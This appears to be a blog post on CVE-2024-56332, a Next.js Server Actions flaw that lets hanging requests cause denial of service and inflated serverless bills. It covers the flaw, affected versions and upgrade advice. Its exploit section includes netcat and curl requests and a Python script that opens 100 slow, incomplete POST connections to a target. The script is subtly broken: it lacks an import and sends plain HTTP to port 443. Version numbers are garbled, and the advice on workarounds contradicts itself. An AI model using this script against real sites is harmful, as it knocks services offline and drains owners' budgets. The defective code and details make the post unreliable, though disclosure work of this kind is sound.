Next.js is a popular React-based framework, powering thousands of high-traffic sites and applications around the world. But starting with version 13.. and before versions 13.5.8, 14.2.21, and 15.1.2, a critical vulnerability—CVE-2024-56332—opened the door for attackers to easily launch Denial of Service (DoS) and even Denial of Wallet (DoW) attacks against sites using Server Actions.

This post will walk you through the details of this vulnerability, how it works, how you can reproduce and potentially exploit it, and—most importantly—how to secure your Next.js deployments.

What is CVE-2024-56332?

CVE-2024-56332 affects Next.js Server Actions introduced in v13. These are special functions you run on the server in response to user actions—like form submissions—with seamless API endpoints.

A flaw in how Next.js handles requests to Server Actions can allow a malicious user to craft HTTP requests that do not complete (for example, sending a request with an invalid Content-Length header or never actually closing the request body). The Next.js server keeps these requests open—hanging until the hosting provider forcibly closes them due to timeout. During this time, the server isn’t using much CPU or memory but is effectively “busy” waiting for that request.

Why Does This Matter?

- On platforms like Vercel or Netlify, which bill based on the duration of function execution, this can rack up real money—hence, Denial of Wallet (DoW).
- Without strict per-request timeouts, enough of these requests can exhaust available connections or instance concurrency, locking out real users—a classic Denial of Service (DoS).

At a Glance: Affected and Safe Versions

- Affected: Next.js versions 13.. to (but not including) 13.5.8, 14.2.21, 15.1.2 (if using Server Actions)

High-Level Attack Idea

An attacker sends a specially crafted HTTP request invoking a Server Action, but the request doesn’t finish (for example: missing/incorrect Content-Length or just never closing the request body). The server keeps the connection open, waiting, burning up a spot in its available pool.

Do this enough times, and you exhaust the slots—legit traffic is blocked, and on metered platforms, your hosting bills spike sky-high.

Simple Exploit Example

Here’s a straightforward way to reproduce the behavior, using plain Node.js (or curl – see below):

Example: Incomplete HTTP POST via netcat

Just replace my-site.com with your actual Next.js deployment.

# Open a raw TCP connection to your server (port 443 for HTTPS, or 80 for HTTP)
nc my-site.com 443

# Then, manually type/paste this minimal HTTP request (with a Server Action route):
POST /api/some-server-action HTTP/1.1
Host: my-site.com
Content-Length: 100

{"foo": "bar"

Notice: We declare Content-Length as 100, but only send a partial body. Then stop sending data, and keep the connection open.

Result: The server will keep waiting for the rest of the body—tying up the function and preventing it (and the connection) from finishing.

Here’s a small Python script that opens (say, 100) incomplete requests at once

import socket
import threading

HOST = 'my-site.com'
PORT = 443  # Use 443 for HTTPS, or 80 for HTTP
SERVER_ACTION_PATH = '/api/some-server-action'

def slow_post():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    req = f"POST {SERVER_ACTION_PATH} HTTP/1.1\r\nHost: {HOST}\r\nContent-Length: 10000\r\n\r\n"
    s.send(req.encode())
    # Never (or very slowly) send the body
    while True:
        s.send(b"x")
        time.sleep(10)

for _ in range(100):
    threading.Thread(target=slow_post).start()

> Warning! Never test this on production servers or without explicit permission—it’s a real DoS attack.

Or, Using Curl

curl -X POST https://my-site.com/api/some-server-action \
  -H "Content-Length: 100" \
  --data-binary '{"foo":"bar"'
# Then hit Ctrl+C before it finishes, simulating a hanging request

Why Is This a Big Deal?

- The server is *idle* (low CPU/mem use), but the connection is still "busy" and unavailable for real users
- No rate limiting, per-request timeouts, or buffering? Then it’s just as bad as old HTTP Slowloris attacks
- Your cloud bill can skyrocket on serverless platforms that charge per open connection/request

Especially dangerous on unprotected, self-hosted deployments

- Even managed platforms (Vercel, Netlify) rely on default timeouts—drop too many of these, and you still get hit (DoW especially)

Upgrade to 13.5.8, 14.2.21, or 15.1.2 (or higher)

- See: Next.js Changelog

No Workarounds

Officially, no config/patch can block this at the app layer—you must upgrade.

Ensuring hosting provider enforces strict per-request timeouts (Vercel = 10s, Netlify = 10s default)

- Setting upstream load balancers/immediate front controllers (e.g., NGINX, AWS ALB) to close slow, incomplete transfers fast

References and Further Reading

- Github Security Advisory: GHSA-5gjw-jcpq-chwh

Next.js Release Notes:

- v13.5.8
- v14.2.21
- v15.1.2
- NIST NVD entry
- Next.js Server Actions Documentation

Are you using Server Actions on Next.js 13+? Upgrade right now!

- No official fix if you stay on old versions—your site is open to cheap, low-resource DoS and potentially wallet-draining attacks.

If you haven’t already, enable strict timeouts and connection limits in your hosting env.

Stay safe—update fast, and keep your wallet (and your site!) protected.


_This post was written exclusively for security-focused Next.js developers in simple American English. For more, subscribe or check the references above._

Timeline

Published on: 01/03/2025 21:15:13 UTC